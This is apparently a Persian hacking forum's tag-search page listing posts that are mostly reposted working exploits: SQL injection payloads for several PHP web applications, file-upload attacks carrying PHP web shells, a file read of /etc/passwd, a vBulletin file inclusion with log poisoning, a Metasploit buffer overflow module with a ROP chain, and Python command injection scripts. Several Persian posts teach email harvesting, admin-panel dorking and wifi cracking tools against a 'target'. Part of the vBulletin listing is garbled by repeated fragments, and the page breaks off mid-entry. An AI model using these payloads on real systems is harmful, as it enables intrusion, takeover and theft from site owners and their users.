رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

690 نتیجه پیدا شد

  1. با سلام به کاربران عزیز anonysec میخوام یک اموزش خوب براتون قرار بدم اموزش جمع اوری ایمیل های یک سایت با کالی لینوکس ابتدا ترمینال را باز نمایید و دستور theharvester –d target.com -b all خب به جای taget.com ادرس سایتی که میخواهید ایمیل هایش را جمع کنید را بزنید و اطلاعات سایت را برای شما نمایش دهد امید وارم خوشتون امده باشه
  2. Hacking

    برنامه gnu root را از گوگل پلی دانلود کرده و اجرا کنید منتظر بمانید تا فایل های انتقال داده شود حدودا 15 دقیقه و یا 30 دقیقه منتظر بمانید تا تمام شود بعد عبارت زیر را در ترمینال gnu root debian تایپ کنید apt install update بعد عبارت apt install wifite را زده و ابزار را نصب کنید بعد با عبارت wifite کلا ابزار را اجرا کنید با تشکر
  3. Hacking

    با سلام در این اموزش میخوام اموزش پیدا کردن لینک پنل ادمین انواع سایت هارا برای شما بگذارم خب طبق نگاه به دروک های زیر inpage:admin site:example.com intitle:admin site:example.com inpage:login site:example.com intitle:login site:example.com intext:login site:example.com به جای example.com سایت یا تراگت خود را قرار دهید با تشکر
  4. Hacking

    خب بریم سراغ اموزش :)ّ 1- اول از گوگل پلی برنامه termux را دانلود کنید 2- حالا در قسمت ترمینال دستور هارا وارد کنید Pkg install nmap را تایپ کنید با تشکر Ãñóñÿ sec
  5. Hacking

    # # # # # # Exploit Title: Joomla! Component JBuildozer 1.4.1 - SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://jbuildozer.com/ # Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/jbuildozer/ # Version: 1.4.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=[SQL] # # 1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # http://server/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20%20%2f*!05555Procedure*%2f%20%2f*!05555Analyse*%2f%20%28extractvalue(0%2c%2f*!05555concat*%2f%280x27,0x496873616e2053656e63616e,0x3a,@@version%29%29,0%29%2d%2d%20%2d # # # # # #
  6. Hacking

    # # # # # # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload # Dork: N/A # Date: 11.12.2017 # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 # Demo: http://vanguard-demo.esy.es/ # Version: 1.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # ..................... # $row = $row->fetch(PDO::FETCH_ASSOC); # $folder_name = $row['id'] * 2; # $folder_name_2 = $folder_name * 5; # $check_dir1 = 'uploads/'.$folder_name; # $check_dir2 = $check_dir.'/'.$folder_name_2; # if (!is_dir($check_dir1)) { mkdir($check_dir1); } # if (!is_dir($check_dir2)) { mkdir($check_dir2); } # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']); # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']); # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']); # $error = 0; # $upload_path = './'; # ..................... # # Proof of Concept: # # Users Add a new product/Add a product preview... # # http://localhost/[PATH]/ # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php # # # # # #
  7. # Exploit Title: Unauthenticated Arbitrary File Upload # Date: November 12, 2017 # Exploit Author: Colette Chamberland # Author contact: [email protected] # Author homepage: https://defiant.com # Vendor Homepage: https://accesspressthemes.com/ # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446 # Version: < 3.2.0 # Tested on: Wordpress 4.x # CVE : CVE-2017-16949 Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. PoC: POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1 Host:server User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_GET['e'].' 2>&1'); ?> -----------------------------7230359611602921801124357792--
  8. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read Author: Jakub Palaczynski CVE: CVE-2017-16787 Exploit tested on: ================== Meinberg LANTIME Web Configuration Utility 6.16.008 Vulnerability affects: ====================== All LTOS6 firmware releases before 6.24.004 Vulnerability: ************** Arbitrary File Read: ==================== It is possible to read arbitrary file on the system with root permissions Proof of Concept: First instance: https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx Info-User user is able to read any file on the system with root permissions. Second instance: User with Admin-User access is able to read any file on the system via firmware update functionality. Curl accepts "file" schema which actually downloads file from the filesystem. Then it is possible to download /upload/update file which contains content of requested file. Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com
  9. # SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 ## Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. ## Vulnerability details vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=. The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server. **Listing of /index.php:** ``` /* 48 */ $app = vB5_Frontend_Application::init('config.php'); /* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini /* 50 */ //file to catch these situations. /* 51 */ // We report all errors here because we have to make Application Notice free /* 52 */ error_reporting(E_ALL | E_STRICT); /* 53 */ /* 54 */ $config = vB5_Config::instance(); /* 55 */ if (!$config->report_all_php_errors) { /* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4 /* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT)); /* 58 */ } /* 59 */ /* 60 */ $routing = $app->getRouter(); /* 61 */ $method = $routing->getAction(); /* 62 */ $template = $routing->getTemplate(); /* 63 */ $class = $routing->getControllerClass(); /* 64 */ /* 65 */ if (!class_exists($class)) /* 66 */ { /* 67 */ // @todo - this needs a proper error message /* 68 */ die("Couldn't find controller file for $class"); /* 69 */ } /* 70 */ /* 71 */ vB5_Frontend_ExplainQueries::initialize(); /* 72 */ $c = new $class($template); /* 73 */ /* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments()); /* 75 */ /* 76 */ vB5_Frontend_ExplainQueries::finish(); ``` **Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:** ``` /* 15 */ public static function init($configFile) /* 16 */ { /* 17 */ parent::init($configFile); /* 18 */ /* 19 */ self::$instance = new vB5_Frontend_Application(); /* 20 */ self::$instance->router = new vB5_Frontend_Routing(); /* 21 */ self::$instance->router->setRoutes(); /* ... */ ``` We can see that setRoutes() is called: **Listing of /includes/vb5/frontend/routing.php:** ``` /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css') /* 85 */ OR (strtolower(substr($path, -3)) == '.js') ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 91 */ /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* 243 */ /* 244 */ vB5_ApplicationAbstract::checkState(); /* 245 */ /* 246 */ throw new vB5_Exception_404("invalid_page_url"); /* 247 */ } ) ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* … */ ``` So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain ‘/’ char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php: ``` /* 63 */ public function legacy($file) /* 64 */ { /* 65 */ $api = Api_InterfaceAbstract::instance(); /* 66 */ $api->relay($file); /* 67 */ } ``` If we will check relay() from Api_Interface_Collapsed class – /include/api/interface/collapsed.php: ``` /* 117 */ public function relay($file) /* 118 */ { /* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file; /* 120 */ /* 121 */ if ($file AND file_exists($filePath)) /* 122 */ { /* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in /* 124 */ //index.php won't take place. If we better integrate the admincp into the /* 125 */ //frontend, we can (and should) remove this. /* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish')); /* 127 */ require_once($filePath); /* 128 */ } /* ... */ ``` As we could see an attacker is not able to use ‘/’ in the $file so he cannot change current directory on Linux. But for Windows he can use ‘\’ as path delimiter and is able to specify any desired file (he can use ‘\..\’ trick as well) and it will be included by php. ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg) If we want to include file with extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (‘.’) or space (‘%20’) to the filename. ## Proof of Concept We can check if the server is vulnerable by sending the following GET request: ``` /index.php?routestring=.\\ ``` If the response is: ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png) The server is vulnerable. If we want to inject a php code to any file on the server we can use the access.log for example: ``` /?LogINJ_START=<?php phpinfo();?>LogINJ_END ``` After that we can include access.log with our PHP code: ``` /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log ``` ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)
  10. Hacking

    # # # # # # Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ # Demo: http://www.smsemailmarketing.in/demo/videosharing/ # Version: 3.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17649 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability implication allows an attacker to inject html code .... # # Proof of Concept: # # 1) # http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= # # # # # # #
  11. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  12. Hacking

    # # # # # # Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection # Dork: N/A # Date: 12.12.2017 # Vendor Homepage: http://piwigo.org/ # Software Link: http://piwigo.org/basics/downloads # Version: <= 2.9.1 # Category: Webapps # Tested on: WiN7_x64/WIN10_X64 # CVE: CVE-2017-10682 # # # # # # Exploit Author: Akityo # Email: [email protected] # # # # # # Description: # # SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter # in the comments or status page to cat_options.php. # # # # # # # # Proof-of-Concent: # # POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1 # Host: www.test.com # Content-Length: 34 # Cache-Control: max-age=0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 # Upgrade-Insecure-Requests: 1 # User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 # Content-Type: application/x-www-form-urlencoded # Accept-Encoding: gzip, deflate # Accept-Language: zh-CN,zh;q=0.8 # Cookie: null # Connection: close # # cat_false%5B%5D=[payload here]&trueify=%C2%AB # # # # # # #
  13. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  14. Hacking

    #!/usr/bin/python # -*- coding: utf-8 -*- # Author: Nixawk # CVE-2017-17411 # Linksys WVBR0 25 Command Injection """ $ python2.7 exploit-CVE-2017-17411.py [*] Usage: python exploit-CVE-2017-17411.py <URL> $ python2.7 exploit-CVE-2017-17411.py http://example.com/ [+] Target is exploitable by CVE-2017-17411 """ import requests def check(url): payload = '"; echo "admin' md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum resp = send_http_request(url, payload) if not resp: return False lines = resp.text.splitlines() sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines) if not any([payload in sys_cmd for sys_cmd in sys_cmds]): return False if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]): return False print("[+] Target is exploitable by CVE-2017-17411 ") return True def send_http_request(url, payload): headers = { 'User-Agent': payload } response = None try: response = requests.get(url, headers=headers) except Exception as err: log.exception(err) return response if __name__ == '__main__': import sys if len(sys.argv) != 2: print("[*] Usage: python %s <URL>" % sys.argv[0]) sys.exit(0) check(sys.argv[1]) # google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US" ## References # https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair # https://thehackernews.com/2017/12/directv-wvb-hack.html
  15. Hacking

    # Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution # Author: Nassim Asrir # Contact: [email protected] / @asrir_nassim # CVE: Waiting ... # CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P # Vendor: http://www.innotube.com Details: ======== First we need to know what happens when we need to LogIn. When the User or Attacker insert any strings in the login form he/she will get this POST request: POST /cgi-bin/drknow.cgi?req=login HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://server/log-in.html?lang=KOR Content-Type: application/x-www-form-urlencoded Content-Length: 45 Connection: close Upgrade-Insecure-Requests: 1 req=login&lang=KOR&username=admin&password=admin Ok now we have this POST request and all we care about is the ‘username’ parameter . and we can execute our system commands via this parameter due to missing input sanitization. The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….) Exploit: ======= #i am not responsible for any wrong use. import requests target = raw_input('Target(With proto) : ') command = raw_input('Command To Execute : ') fullpath=target +"/cgi-bin/drknow.cgi?req=login" data = {'req':'login', 'lang':'ENG', 'username':'admin|'+command+'||x', 'password':'admin'} execute = requests.post(fullpath, data = data) print execute.text
  16. Exploit Title: Monstra CMS - 3.0.4 RCE Vendor Homepage: http://monstra.org/ Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip Discovered by: Ishaq Mohammed Contact: https://twitter.com/security_prince Website: https://about.me/security-prince Category: webapps Platform: PHP Advisory Link: https://blogs.securiteam.com/index.php/archives/3559 Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19: public static function main() { // Array of forbidden types $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty'); Proof of Concept Steps to Reproduce: 1. Login with a valid credentials of an Editor 2. Select Files option from the Drop-down menu of Content 3. Upload a file with PHP (uppercase)extension containing the below code: <?php $cmd=$_GET['cmd']; system($cmd); ?> 4. Click on Upload 5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc. Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426
  17. Hacking

    # # # # # # Exploit Title: Cells Blog 3.5 - SQL Injection # Dork: N/A # Date: 16.12.2017 # Vendor Homepage: http://www.cells.tw/ # Software Link: http://www.cells.tw/cells/ # Version: 3.5 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL] # # -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d # # Parameter: bgid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1 AND 9841=9841&fmid=7 # # Parameter: fmid (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: bgid=1&fmid=7 AND 2056=2056 # 2) # http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL] # # Parameter: fnid 